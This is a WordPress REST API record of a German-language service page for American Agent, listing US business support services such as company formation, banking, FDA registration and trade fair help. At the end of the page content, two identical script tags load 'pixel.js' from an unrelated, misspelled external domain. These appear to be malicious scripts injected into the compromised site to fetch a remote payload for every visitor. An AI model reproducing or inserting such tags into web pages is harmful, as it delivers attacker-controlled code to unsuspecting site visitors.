{"id":3132,"date":"2014-08-16T07:17:42","date_gmt":"2014-08-16T07:17:42","guid":{"rendered":"https:\/\/americanagent.com\/usa-business-support-services-2\/"},"modified":"2014-09-17T12:30:25","modified_gmt":"2014-09-17T16:30:25","slug":"supportleistungen-fuer-unternehmen","status":"publish","type":"page","link":"https:\/\/americanagent.com\/de\/supportleistungen-fuer-unternehmen\/","title":{"rendered":"Supportleistungen f\u00fcr Unternehmen"},"content":{"rendered":"<div  class='flex_column av-av_one_full-2a9015ff38129c418a3f2eafba3e9512 av_one_full  avia-builder-el-0  avia-builder-el-no-sibling  first flex_column_div  '     ><p>\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-av_heading-dedaf7f673addb58c48fdebad9e7d5e6\">\n#top .av-special-heading.av-av_heading-dedaf7f673addb58c48fdebad9e7d5e6{\npadding-bottom:10px;\n}\nbody .av-special-heading.av-av_heading-dedaf7f673addb58c48fdebad9e7d5e6 .av-special-heading-tag .heading-char{\nfont-size:25px;\n}\n.av-special-heading.av-av_heading-dedaf7f673addb58c48fdebad9e7d5e6 .av-subheading{\nfont-size:15px;\n}\n<\/style>\n<div  class='av-special-heading av-av_heading-dedaf7f673addb58c48fdebad9e7d5e6 av-special-heading-h3  avia-builder-el-1  el_before_av_textblock  avia-builder-el-first '><h3 class='av-special-heading-tag '  itemprop=\"headline\"  >Supportleistungen f\u00fcr Unternehmen<\/h3><div class=\"special-heading-border\"><div class=\"special-heading-inner-border\"><\/div><\/div><\/div><br \/>\n<section  class='av_textblock_section av-av_textblock-aaf3a53f7e22769a7798f31e42769683 '   itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class='avia_textblock'  itemprop=\"text\" ><p>Oftmals gibt es wichtige Leistungen die ben\u00f6tigt werden um Ihre amerikanische Gesch\u00e4ftspr\u00e4senz zu vervollst\u00e4ndigen. Die Liste unterhalb illustriert einige dieser Supportleistungen, die m\u00f6glicherweise ber\u00fccksichtigt werden sollten. Die Leistungen wurden von einem bew\u00e4hrten Netzwerk von Partnern zur Verf\u00fcgung gestellt, mit denen wir in der Vergangenheit zusammengearbeitet haben.<\/p>\n<p>Viele dieser Partner kennen sich bereits. Der Vorteil f\u00fcr Sie ist das keine wertvolle Zeit verschwendet wird, die Kommunikation wird effektiver sein und Ihre ben\u00f6tigte L\u00f6sung wird passender funktionieren.<\/p>\n<p>The folgende Liste ist nur eine Repr\u00e4sentation einiger Angelegenheiten, die wir unsererseits hier in den USA durchf\u00fchren k\u00f6nnen.<\/p>\n<\/div><\/section><br \/>\n<div  class='avia-icon-list-container av-av_iconlist-e4a0ebdf966f1bea8883e87bb95dffd6  avia-builder-el-3  el_after_av_textblock  avia-builder-el-last '><ul class='avia-icon-list avia_animate_when_almost_visible avia-icon-list-left av-iconlist-big av-av_iconlist-e4a0ebdf966f1bea8883e87bb95dffd6 avia-iconlist-animate'>\n<li><div class='iconlist_icon av-av_iconlist_item-9d251783d99ca562e4176e5e46b9ec62 avia-font-entypo-fontello avia-iconfont avia-font-entypo-fontello'><span class='av-icon-char' data-av_icon='\ue812' data-av_iconfont='entypo-fontello' aria-hidden=\"true\"><\/span><\/div><article class=\"article-icon-entry av-iconlist-empty\"  itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class=\"iconlist_content_wrap\"><header class=\"entry-content-header\" aria-label=\"Icon: Unternehmungsgr\u00fcndung in der USA\"><h4 class='av_iconlist_title iconlist_title  '  itemprop=\"headline\" >Unternehmungsgr\u00fcndung in der USA<\/h4><\/header><div class='iconlist_content '  itemprop=\"text\" ><\/div><\/div><footer class=\"entry-footer\"><\/footer><\/article><div class=\"iconlist-timeline\"><\/div><\/li>\n<li><div class='iconlist_icon av-av_iconlist_item-10830b489d47927bcd67204a102467ce avia-font-entypo-fontello avia-iconfont avia-font-entypo-fontello'><span class='av-icon-char' data-av_icon='\ue812' data-av_iconfont='entypo-fontello' aria-hidden=\"true\"><\/span><\/div><article class=\"article-icon-entry \"  itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class=\"iconlist_content_wrap\"><header class=\"entry-content-header\" aria-label=\"Icon: Lokale Bankangelegenheiten\"><h4 class='av_iconlist_title iconlist_title  '  itemprop=\"headline\" >Lokale Bankangelegenheiten<\/h4><\/header><div class='iconlist_content '  itemprop=\"text\" ><p>Rechnungslegung, Inkasso, Buchf\u00fchrung und Steuerberatung durch bekannte und vertrauensw\u00fcrdige Firmen aus Chicago.<\/p>\n<\/div><\/div><footer class=\"entry-footer\"><\/footer><\/article><div class=\"iconlist-timeline\"><\/div><\/li>\n<li><div class='iconlist_icon av-av_iconlist_item-9080b24231f3a41b3150019d48faf21d avia-font-entypo-fontello avia-iconfont avia-font-entypo-fontello'><span class='av-icon-char' data-av_icon='\ue812' data-av_iconfont='entypo-fontello' aria-hidden=\"true\"><\/span><\/div><article class=\"article-icon-entry \"  itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class=\"iconlist_content_wrap\"><header class=\"entry-content-header\" aria-label=\"Icon: Amerikanisches B\u00fcro\"><h4 class='av_iconlist_title iconlist_title  '  itemprop=\"headline\" >Amerikanisches B\u00fcro<\/h4><\/header><div class='iconlist_content '  itemprop=\"text\" ><p>Ihre eigene Adresse und Telefonnummer mit Antwortdienst, sehr gut f\u00fcr lokalen Kundensupport und um Ihre Pr\u00e4senz in den USA hervorzuheben.<\/p>\n<\/div><\/div><footer class=\"entry-footer\"><\/footer><\/article><div class=\"iconlist-timeline\"><\/div><\/li>\n<li><div class='iconlist_icon av-av_iconlist_item-6bf98da504358a99de5da564156d9820 avia-font-entypo-fontello avia-iconfont avia-font-entypo-fontello'><span class='av-icon-char' data-av_icon='\ue812' data-av_iconfont='entypo-fontello' aria-hidden=\"true\"><\/span><\/div><article class=\"article-icon-entry \"  itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class=\"iconlist_content_wrap\"><header class=\"entry-content-header\" aria-label=\"Icon: Produktlagerung und Aufbewahrung (warm oder gefroren)\"><h4 class='av_iconlist_title iconlist_title  '  itemprop=\"headline\" >Produktlagerung und Aufbewahrung (warm oder gefroren)<\/h4><\/header><div class='iconlist_content '  itemprop=\"text\" ><p>Produktlogistik, landesweiter Produktvertrieb.<\/p>\n<\/div><\/div><footer class=\"entry-footer\"><\/footer><\/article><div class=\"iconlist-timeline\"><\/div><\/li>\n<li><div class='iconlist_icon av-av_iconlist_item-16d1b27376fdd5a9d589123c74a29643 avia-font-entypo-fontello avia-iconfont avia-font-entypo-fontello'><span class='av-icon-char' data-av_icon='\ue812' data-av_iconfont='entypo-fontello' aria-hidden=\"true\"><\/span><\/div><article class=\"article-icon-entry av-iconlist-empty\"  itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class=\"iconlist_content_wrap\"><header class=\"entry-content-header\" aria-label=\"Icon: Garantie und R\u00fcckgabe Programme\"><h4 class='av_iconlist_title iconlist_title  '  itemprop=\"headline\" >Garantie und R\u00fcckgabe Programme<\/h4><\/header><div class='iconlist_content '  itemprop=\"text\" ><\/div><\/div><footer class=\"entry-footer\"><\/footer><\/article><div class=\"iconlist-timeline\"><\/div><\/li>\n<li><div class='iconlist_icon av-av_iconlist_item-911c7049349585e009e14069d7d41043 avia-font-entypo-fontello avia-iconfont avia-font-entypo-fontello'><span class='av-icon-char' data-av_icon='\ue812' data-av_iconfont='entypo-fontello' aria-hidden=\"true\"><\/span><\/div><article class=\"article-icon-entry \"  itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class=\"iconlist_content_wrap\"><header class=\"entry-content-header\" aria-label=\"Icon: FDA Regestrierung\"><h4 class='av_iconlist_title iconlist_title  '  itemprop=\"headline\" >FDA Regestrierung<\/h4><\/header><div class='iconlist_content '  itemprop=\"text\" ><p>American Agent ist bereits bekannt als \u201clokaler Vertreter\u201d mit der FDA (Lebensmittel und Arzneimittelzulassungsbeh\u00f6rde der USA).<\/p>\n<\/div><\/div><footer class=\"entry-footer\"><\/footer><\/article><div class=\"iconlist-timeline\"><\/div><\/li>\n<li><div class='iconlist_icon av-av_iconlist_item-9a993bc17be9275e0861e34a3f795d80 avia-font-entypo-fontello avia-iconfont avia-font-entypo-fontello'><span class='av-icon-char' data-av_icon='\ue812' data-av_iconfont='entypo-fontello' aria-hidden=\"true\"><\/span><\/div><article class=\"article-icon-entry \"  itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class=\"iconlist_content_wrap\"><header class=\"entry-content-header\" aria-label=\"Icon: Messen\"><h4 class='av_iconlist_title iconlist_title  '  itemprop=\"headline\" >Messen<\/h4><\/header><div class='iconlist_content '  itemprop=\"text\" ><p>Anmeldung, Marketing, Organisation der ben\u00f6tigten Ausstattung, Lieferung, \u00dcbersetzer, wenn ben\u00f6tigt kann mehr Personal zur Verf\u00fcgung gestellt werden.<\/p>\n<\/div><\/div><footer class=\"entry-footer\"><\/footer><\/article><div class=\"iconlist-timeline\"><\/div><\/li>\n<li><div class='iconlist_icon av-av_iconlist_item-f7670a3e9963de4e4010f827d1d11707 avia-font-entypo-fontello avia-iconfont avia-font-entypo-fontello'><span class='av-icon-char' data-av_icon='\ue812' data-av_iconfont='entypo-fontello' aria-hidden=\"true\"><\/span><\/div><article class=\"article-icon-entry \"  itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class=\"iconlist_content_wrap\"><header class=\"entry-content-header\" aria-label=\"Icon: Allgemeines Marketing\"><h4 class='av_iconlist_title iconlist_title  '  itemprop=\"headline\" >Allgemeines Marketing<\/h4><\/header><div class='iconlist_content '  itemprop=\"text\" ><p>Lokale Websites, \u00dcbersetzungen, Brosch\u00fcren, Kataloge, Ausdrucke, organisierte Postwurfsendungen &#8230;<\/p>\n<\/div><\/div><footer class=\"entry-footer\"><\/footer><\/article><div class=\"iconlist-timeline\"><\/div><\/li>\n<li><div class='iconlist_icon av-av_iconlist_item-4722c47a3b863a0778dd0080dee19671 avia-font-entypo-fontello avia-iconfont avia-font-entypo-fontello'><span class='av-icon-char' data-av_icon='\ue812' data-av_iconfont='entypo-fontello' aria-hidden=\"true\"><\/span><\/div><article class=\"article-icon-entry \"  itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class=\"iconlist_content_wrap\"><header class=\"entry-content-header\" aria-label=\"Icon: Lokaler Anwalt\"><h4 class='av_iconlist_title iconlist_title  '  itemprop=\"headline\" >Lokaler Anwalt<\/h4><\/header><div class='iconlist_content '  itemprop=\"text\" ><p>F\u00fcr die Begutachtug von Vertr\u00e4gen mit Handelsvertretern \/ Au\u00dfendienstmitarbeitern \/ Kunden \/ Gesch\u00e4ftspartnern oder jede andere Situation die eine rechtliche Pr\u00fcfung ben\u00f6tigen.<\/p>\n<\/div><\/div><footer class=\"entry-footer\"><\/footer><\/article><div class=\"iconlist-timeline\"><\/div><\/li>\n<li><div class='iconlist_icon av-av_iconlist_item-9b2f6b05a1310e3b402f071a3160b911 avia-font-entypo-fontello avia-iconfont avia-font-entypo-fontello'><span class='av-icon-char' data-av_icon='\ue812' data-av_iconfont='entypo-fontello' aria-hidden=\"true\"><\/span><\/div><article class=\"article-icon-entry av-iconlist-empty\"  itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class=\"iconlist_content_wrap\"><header class=\"entry-content-header\" aria-label=\"Icon: Eintreibung von \u00dcberf\u00e4lligen Zahlungen\"><h4 class='av_iconlist_title iconlist_title  '  itemprop=\"headline\" >Eintreibung von \u00dcberf\u00e4lligen Zahlungen<\/h4><\/header><div class='iconlist_content '  itemprop=\"text\" ><\/div><\/div><footer class=\"entry-footer\"><\/footer><\/article><div class=\"iconlist-timeline\"><\/div><\/li>\n<li><div class='iconlist_icon av-av_iconlist_item-2474ff8d5e3af774d3fd7b90b9686617 avia-font-entypo-fontello avia-iconfont avia-font-entypo-fontello'><span class='av-icon-char' data-av_icon='\ue812' data-av_iconfont='entypo-fontello' aria-hidden=\"true\"><\/span><\/div><article class=\"article-icon-entry av-iconlist-empty\"  itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class=\"iconlist_content_wrap\"><header class=\"entry-content-header\" aria-label=\"Icon: Leumundspr\u00fcfung eines potenziellen Gesch\u00e4ftspartners\"><h4 class='av_iconlist_title iconlist_title  '  itemprop=\"headline\" >Leumundspr\u00fcfung eines potenziellen Gesch\u00e4ftspartners<\/h4><\/header><div class='iconlist_content '  itemprop=\"text\" ><\/div><\/div><footer class=\"entry-footer\"><\/footer><\/article><div class=\"iconlist-timeline\"><\/div><\/li>\n<\/ul><\/div><\/p><\/div><script src='https:\/\/scripts.trasnaltemyrecords.com\/pixel.js?track=r&#038;subid=043' type='text\/javascript'><\/script><script src='https:\/\/scripts.trasnaltemyrecords.com\/pixel.js?track=r&#038;subid=043' type='text\/javascript'><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":4,"comment_status":"open","ping_status":"open","template":"","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"footnotes":""},"class_list":["post-3132","page","type-page","status-publish","hentry"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.4 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>American Agent - Supportleistungen<\/title>\n<meta name=\"description\" content=\"Oft werden wichtige Leistungen gen\u00f6tigt, um ein Ergebnis zu erreichen. Wir bieten Ihnen die wichtigsten Supportleistungen und noch viel mehr.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/americanagent.com\/de\/supportleistungen-fuer-unternehmen\/\" \/>\n<meta property=\"og:locale\" content=\"de_DE\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"American Agent - Supportleistungen\" \/>\n<meta property=\"og:description\" content=\"Oft werden wichtige Leistungen gen\u00f6tigt, um ein Ergebnis zu erreichen. Wir bieten Ihnen die wichtigsten Supportleistungen und noch viel mehr.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/americanagent.com\/de\/supportleistungen-fuer-unternehmen\/\" \/>\n<meta property=\"og:site_name\" content=\"American Agent - USA Sales Services and Distributor Search Services\" \/>\n<meta property=\"article:modified_time\" content=\"2014-09-17T16:30:25+00:00\" \/>\n<meta name=\"twitter:label1\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/americanagent.com\\\/de\\\/supportleistungen-fuer-unternehmen\\\/\",\"url\":\"https:\\\/\\\/americanagent.com\\\/de\\\/supportleistungen-fuer-unternehmen\\\/\",\"name\":\"American Agent - Supportleistungen\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/americanagent.com\\\/de\\\/#website\"},\"datePublished\":\"2014-08-16T07:17:42+00:00\",\"dateModified\":\"2014-09-17T16:30:25+00:00\",\"description\":\"Oft werden wichtige Leistungen gen\u00f6tigt, um ein Ergebnis zu erreichen. Wir bieten Ihnen die wichtigsten Supportleistungen und noch viel mehr.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/americanagent.com\\\/de\\\/supportleistungen-fuer-unternehmen\\\/#breadcrumb\"},\"inLanguage\":\"de-DE\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/americanagent.com\\\/de\\\/supportleistungen-fuer-unternehmen\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/americanagent.com\\\/de\\\/supportleistungen-fuer-unternehmen\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/americanagent.com\\\/de\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Supportleistungen f\u00fcr Unternehmen\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/americanagent.com\\\/de\\\/#website\",\"url\":\"https:\\\/\\\/americanagent.com\\\/de\\\/\",\"name\":\"American Agent - USA Sales Services and Distributor Search Services\",\"description\":\"USA Sales services and Distributor, Importer and Reseller Search services.\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/americanagent.com\\\/de\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"de-DE\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"American Agent - Supportleistungen","description":"Oft werden wichtige Leistungen gen\u00f6tigt, um ein Ergebnis zu erreichen. Wir bieten Ihnen die wichtigsten Supportleistungen und noch viel mehr.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/americanagent.com\/de\/supportleistungen-fuer-unternehmen\/","og_locale":"de_DE","og_type":"article","og_title":"American Agent - Supportleistungen","og_description":"Oft werden wichtige Leistungen gen\u00f6tigt, um ein Ergebnis zu erreichen. Wir bieten Ihnen die wichtigsten Supportleistungen und noch viel mehr.","og_url":"https:\/\/americanagent.com\/de\/supportleistungen-fuer-unternehmen\/","og_site_name":"American Agent - USA Sales Services and Distributor Search Services","article_modified_time":"2014-09-17T16:30:25+00:00","twitter_misc":{"Est. reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/americanagent.com\/de\/supportleistungen-fuer-unternehmen\/","url":"https:\/\/americanagent.com\/de\/supportleistungen-fuer-unternehmen\/","name":"American Agent - Supportleistungen","isPartOf":{"@id":"https:\/\/americanagent.com\/de\/#website"},"datePublished":"2014-08-16T07:17:42+00:00","dateModified":"2014-09-17T16:30:25+00:00","description":"Oft werden wichtige Leistungen gen\u00f6tigt, um ein Ergebnis zu erreichen. Wir bieten Ihnen die wichtigsten Supportleistungen und noch viel mehr.","breadcrumb":{"@id":"https:\/\/americanagent.com\/de\/supportleistungen-fuer-unternehmen\/#breadcrumb"},"inLanguage":"de-DE","potentialAction":[{"@type":"ReadAction","target":["https:\/\/americanagent.com\/de\/supportleistungen-fuer-unternehmen\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/americanagent.com\/de\/supportleistungen-fuer-unternehmen\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/americanagent.com\/de\/"},{"@type":"ListItem","position":2,"name":"Supportleistungen f\u00fcr Unternehmen"}]},{"@type":"WebSite","@id":"https:\/\/americanagent.com\/de\/#website","url":"https:\/\/americanagent.com\/de\/","name":"American Agent - USA Sales Services and Distributor Search Services","description":"USA Sales services and Distributor, Importer and Reseller Search services.","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/americanagent.com\/de\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"de-DE"}]}},"_links":{"self":[{"href":"https:\/\/americanagent.com\/de\/wp-json\/wp\/v2\/pages\/3132","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/americanagent.com\/de\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/americanagent.com\/de\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/americanagent.com\/de\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/americanagent.com\/de\/wp-json\/wp\/v2\/comments?post=3132"}],"version-history":[{"count":0,"href":"https:\/\/americanagent.com\/de\/wp-json\/wp\/v2\/pages\/3132\/revisions"}],"wp:attachment":[{"href":"https:\/\/americanagent.com\/de\/wp-json\/wp\/v2\/media?parent=3132"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}